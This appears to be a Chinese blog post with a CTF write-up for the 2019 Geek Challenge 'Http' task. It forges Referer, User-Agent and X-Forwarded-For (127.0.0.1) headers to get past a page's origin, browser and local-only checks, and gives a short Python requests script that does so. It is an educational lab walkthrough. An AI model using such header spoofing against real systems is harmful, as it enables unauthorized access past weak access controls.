[极客大挑战 2019]Http(referer,User-Agent,XFF)
2020-04-22 00:15
746 查看
首先查看源代码,找到Secret.php
我们访问这个页面,显示上说这个页面必须来自"https://www.Sycsecret.com"
那就简单了,我们抓包,
又说必须使用Syclover浏览器,我们这里直接修改User-Agent头即可
又说No!!! you can only read this locally!!!,让我们伪造IP,在headers里面添加X-Forwarded-For
得到flag
附录
像这种题可以直接写脚本解决:
# -*- coding: UTF-8 -*- import requests url="http://node3.buuoj.cn:29354/Secret.php" headers={ "Referer": "https://www.Sycsecret.com", "Origin":"https://www.Sycsecret.com", "User-Agent": "Syclover", "X-Forwarded-For": "127.0.0.1" } r=requests.get(url=url,headers=headers) print(r.text)
得到flag。
- 点赞
- 收藏
- 分享
- 文章举报
相关文章推荐
- HTTP_REFERER 与 HTTP_USER_AGENT的使用方法
- httpclient4.3下载远程图片,设置user-agent和refer
- 使用Request.Servervariables("HTTP_USER_AGENT")取值
- 如何在Android应用里对HTTP请求头部添加适当的User-Agent字段
- php通过$_SERVER['HTTP_USER_AGENT']获取浏览器相关参数
- httpuseragent
- 微信公众平台消息接口开发之微信浏览器HTTP_USER_AGENT判断
- Nginx http_user_agent 防御 ab 等
- What is HTTP_USER_AGENT?
- 微信浏览器HTTP_USER_AGENT判断
- Firefox、Chrome、IE9、IE8、IE7、IE6等浏览器HTTP_USER_AGENT汇总
- 使用 Nginx 内置 $http_user_agent 来区分( 电脑 pc、手机 mobile、平板 pad )端的内容访问
- HTTP_USER_AGENT 解析
- buuctf 极客大挑战 http
- http://www.useragentman.com/blog/2010/07/27/creating-cross-browser-html5-forms-now-using-modernizr-w
- Syc 2019第10届极客大挑战wp
- Http Header之User-Agent
- What is HTTP_USER_AGENT?
- HttpUrlConnection设置User-Agent
- Firefox、Chrome、IE9、IE8、IE7、IE6等浏览器HTTP_USER_AGENT汇总